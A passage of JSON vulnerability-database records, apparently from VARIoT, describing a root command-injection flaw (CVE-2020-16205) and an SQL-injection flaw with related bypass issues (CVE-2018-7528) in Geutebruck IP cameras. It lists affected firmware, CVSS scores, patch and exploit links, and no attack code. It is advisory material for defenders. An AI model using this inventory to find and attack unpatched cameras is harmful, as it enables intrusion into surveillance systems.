"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.13.2"
},
{
"model": "g-code eec-2400",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.0.25"
},
{
"model": "g-cam efd-2241",
"scope": "eq",
"trust": 1.0,
"vendor": "geutebrueck",
"version": "1.12.14.5"
},
{
"model": "g-cam/ebc-2110",
"scope": null,
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "g-cam/ebc-2111",
"scope": null,
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "g-cam/efd-2240",
"scope": null,
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "g-cam/efd-2241",
"scope": null,
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "g-cam/efd-2250",
"scope": null,
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "g-cam/ethc-2230",
"scope": null,
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "g-cam/ethc-2239",
"scope": null,
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "g-cam/ethc-2240",
"scope": null,
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "g-cam/ethc-2249",
"scope": null,
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "g-cam/ewpc-2270",
"scope": null,
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "g-code/eec-2400",
"scope": null,
"trust": 0.8,
"vendor": "geutebruck",
"version": null
},
{
"model": "g-code: eec-2xxx version",
"scope": "lt",
"trust": 0.6,
"vendor": "geutebruck",
"version": "1.12.0.27"
},
{
"model": "g-cam: ebc-21xx version",
"scope": "lt",
"trust": 0.6,
"vendor": "geutebruck",
"version": "1.12.0.27"
},
{
"model": "g-cam:efd-22xx version",
"scope": "lt",
"trust": 0.6,
"vendor": "geutebruck",
"version": "1.12.0.27"
},
{
"model": "g-cam:ethc-22xx version",
"scope": "lt",
"trust": 0.6,
"vendor": "geutebruck",
"version": "1.12.0.27"
},
{
"model": "g-cam:ewpc-22xx version",
"scope": "lt",
"trust": 0.6,
"vendor": "geutebruck",
"version": "1.12.0.27"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-14829"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-009458"
},
{
"db": "NVD",
"id": "CVE-2020-16205"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:geutebrueck:g-cam_ebc-2110_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:geutebrueck:g-cam_efd-2240_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:geutebrueck:g-cam_efd-2241_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:geutebrueck:g-cam%2fefd-2250_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:geutebrueck:g-code_eec-2400_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-009458"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Davy Douhine of RandoriSec",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202008-267"
}
],
"trust": 0.6
},
"cve": "CVE-2020-16205",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CVE-2020-16205",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "JVNDB-2020-009458",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CNVD-2021-14829",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.2,
"id": "CVE-2020-16205",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.2,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2020-009458",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-16205",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2020-009458",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2021-14829",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202008-267",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-14829"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-009458"
},
{
"db": "CNNVD",
"id": "CNNVD-202008-267"
},
{
"db": "NVD",
"id": "CVE-2020-16205"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Using a specially crafted URL command, a remote authenticated user can execute commands as root on the G-Cam and G-Code (Firmware Versions 1.12.0.25 and prior as well as the limited Versions 1.12.13.2 and 1.12.14.5). G-Cam and G-Code To OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Geutebruck GmbH is a German high-tech private company that specializes in designing and producing high-quality, perfectly matched video security solutions. \n\r\n\r\nGeutebruck IP Cameras certification RCE vulnerability",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-16205"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-009458"
},
{
"db": "CNVD",
"id": "CNVD-2021-14829"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-16205",
"trust": 3.0
},
{
"db": "ICS CERT",
"id": "ICSA-20-219-03",
"trust": 2.4
},
{
"db": "PACKETSTORM",
"id": "158888",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2020-009458",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-14829",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2719",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202008-267",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-14829"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-009458"
},
{
"db": "CNNVD",
"id": "CNNVD-202008-267"
},
{
"db": "NVD",
"id": "CVE-2020-16205"
}
]
},
"id": "VAR-202008-0367",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.9440476214285715
},
"last_update_date": "2024-11-23T22:33:23.600000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.geutebrueck.com/index.html"
},
{
"title": "Patch for Geutebruck IP Cameras certification RCE vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/251321"
},
{
"title": "Geutebr\u00fcck G-Cam and G-Code Fixes for operating system command injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=126603"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-14829"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-009458"
},
{
"db": "CNNVD",
"id": "CNNVD-202008-267"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-009458"
},
{
"db": "NVD",
"id": "CVE-2020-16205"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03"
},
{
"trust": 2.4,
"url": "http://packetstormsecurity.com/files/158888/geutebruck-testaction.cgi-remote-command-execution.html"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-16205"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-16205"
},
{
"trust": 0.6,
"url": "https://www.randorisec.fr/s05e01-rce-on-geutebruck-ip-cameras/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2719/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-14829"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-009458"
},
{
"db": "CNNVD",
"id": "CNNVD-202008-267"
},
{
"db": "NVD",
"id": "CVE-2020-16205"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-14829"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-009458"
},
{
"db": "CNNVD",
"id": "CNNVD-202008-267"
},
{
"db": "NVD",
"id": "CVE-2020-16205"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-08-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-14829"
},
{
"date": "2020-11-06T05:06:27",
"db": "JVNDB",
"id": "JVNDB-2020-009458"
},
{
"date": "2020-08-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202008-267"
},
{
"date": "2020-08-14T14:15:12.487000",
"db": "NVD",
"id": "CVE-2020-16205"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-03-08T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-14829"
},
{
"date": "2020-11-06T05:06:27",
"db": "JVNDB",
"id": "JVNDB-2020-009458"
},
{
"date": "2020-08-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202008-267"
},
{
"date": "2024-11-21T05:06:55.957000",
"db": "NVD",
"id": "CVE-2020-16205"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202008-267"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "G-Cam and G-Code In OS Command injection vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-009458"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202008-267"
}
],
"trust": 0.6
}
}
VAR-201803-2218
Vulnerability from variot - Updated: 2024-11-23 21:53An SQL injection vulnerability has been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which may allow an attacker to alter stored data. The G-Cam/EFD-2250 and ToplineTopFD-2125 are both high-definition cameras from Geutebruck. Multiple Geutebruck devices are prone to the following multiple security vulnerabilities. 1. An authentication-bypass vulnerability 2. A SQL-injection vulnerability 3. A cross-site request-forgery vulnerability 4. An access-bypass vulnerability 5. A security-bypass vulnerability 6. A cross-site scripting vulnerability Attackers may exploit these issues to gain unauthorized access to the affected device, or to bypass certain security restrictions to perform unauthorized actions, to compromise the application to access or modify data and to exploit vulnerabilities in the underlying database, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site or to execute arbitrary code within the context of the affected device. The following devices are vulnerable: Geutebruck G-Cam/EFD-2250 version 1.12.0.4 Geutebruck Topline TopFD-2125 version 3.15.1. Geutebrück G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of German Geutebrück company
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201803-2218",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "g-cam/efd-2250",
"scope": "eq",
"trust": 1.7,
"vendor": "geutebruck",
"version": "1.12.0.4"
},
{
"model": "topfd-2125",
"scope": "eq",
"trust": 1.6,
"vendor": "geutebrueck",
"version": "3.15.1"
},
{
"model": "g-cam\\/efd-2250",
"scope": "eq",
"trust": 1.6,
"vendor": "geutebrueck",
"version": "1.12.0.4"
},
{
"model": "topline topfd-2125",
"scope": "eq",
"trust": 0.9,
"vendor": "geutebruck",
"version": "3.15.1"
},
{
"model": "topfd-2125",
"scope": "eq",
"trust": 0.8,
"vendor": "geutebruck",
"version": "3.15.1"
},
{
"model": "g-cam/efd-2250",
"scope": "ne",
"trust": 0.3,
"vendor": "geutebruck",
"version": "1.12.0.19"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "g cam efd 2250",
"version": "1.12.0.4"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "topfd 2125",
"version": "3.15.1"
}
],
"sources": [
{
"db": "IVD",
"id": "e2e94500-39ab-11e9-a236-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06024"
},
{
"db": "BID",
"id": "103474"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003345"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-762"
},
{
"db": "NVD",
"id": "CVE-2018-7528"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:geutebruck:g-cam%2fefd-2250_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:geutebruck:topfd-2125_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-003345"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Davy Douhine of RandoriSec and Nicolas Mattiocco of Greenlock.",
"sources": [
{
"db": "BID",
"id": "103474"
}
],
"trust": 0.3
},
"cve": "CVE-2018-7528",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2018-7528",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 9.4,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-06024",
"impactScore": 9.2,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "NONE",
"baseScore": 9.4,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "e2e94500-39ab-11e9-a236-000c29342cb1",
"impactScore": 9.2,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:N",
"version": "2.9 [IVD]"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-137560",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2018-7528",
"impactScore": 5.2,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-7528",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2018-7528",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2018-06024",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201803-762",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "IVD",
"id": "e2e94500-39ab-11e9-a236-000c29342cb1",
"trust": 0.2,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-137560",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "e2e94500-39ab-11e9-a236-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06024"
},
{
"db": "VULHUB",
"id": "VHN-137560"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003345"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-762"
},
{
"db": "NVD",
"id": "CVE-2018-7528"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An SQL injection vulnerability has been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which may allow an attacker to alter stored data. The G-Cam/EFD-2250 and ToplineTopFD-2125 are both high-definition cameras from Geutebruck. Multiple Geutebruck devices are prone to the following multiple security vulnerabilities. \n1. An authentication-bypass vulnerability\n2. A SQL-injection vulnerability\n3. A cross-site request-forgery vulnerability\n4. An access-bypass vulnerability\n5. A security-bypass vulnerability\n6. A cross-site scripting vulnerability\nAttackers may exploit these issues to gain unauthorized access to the affected device, or to bypass certain security restrictions to perform unauthorized actions, to compromise the application to access or modify data and to exploit vulnerabilities in the underlying database, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site or to execute arbitrary code within the context of the affected device. \nThe following devices are vulnerable:\nGeutebruck G-Cam/EFD-2250 version 1.12.0.4\nGeutebruck Topline TopFD-2125 version 3.15.1. Geutebr\u00fcck G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of German Geutebr\u00fcck company",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7528"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003345"
},
{
"db": "CNVD",
"id": "CNVD-2018-06024"
},
{
"db": "BID",
"id": "103474"
},
{
"db": "IVD",
"id": "e2e94500-39ab-11e9-a236-000c29342cb1"
},
{
"db": "VULHUB",
"id": "VHN-137560"
}
],
"trust": 2.7
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-7528",
"trust": 3.6
},
{
"db": "ICS CERT",
"id": "ICSA-18-079-01",
"trust": 3.4
},
{
"db": "BID",
"id": "103474",
"trust": 2.0
},
{
"db": "CNVD",
"id": "CNVD-2018-06024",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201803-762",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003345",
"trust": 0.8
},
{
"db": "IVD",
"id": "E2E94500-39AB-11E9-A236-000C29342CB1",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-137560",
"trust": 0.1
}
],
"sources": [
{
"db": "IVD",
"id": "e2e94500-39ab-11e9-a236-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06024"
},
{
"db": "VULHUB",
"id": "VHN-137560"
},
{
"db": "BID",
"id": "103474"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003345"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-762"
},
{
"db": "NVD",
"id": "CVE-2018-7528"
}
]
},
"id": "VAR-201803-2218",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "e2e94500-39ab-11e9-a236-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06024"
},
{
"db": "VULHUB",
"id": "VHN-137560"
}
],
"trust": 1.7456349166666667
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"ICS",
"Network device"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "e2e94500-39ab-11e9-a236-000c29342cb1"
},
{
"db": "CNVD",
"id": "CNVD-2018-06024"
}
]
},
"last_update_date": "2024-11-23T21:53:17.817000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.geutebrueck.com/en_EN.html"
},
{
"title": "GeutebruckIPCamerasSQL injection vulnerability patch",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/122849"
},
{
"title": "Geutebr\u00fcck G-Cam/EFD-2250 and Topline TopFD-2125 SQL Repair measures for injecting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=79348"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06024"
},
{
"db": "JVNDB",
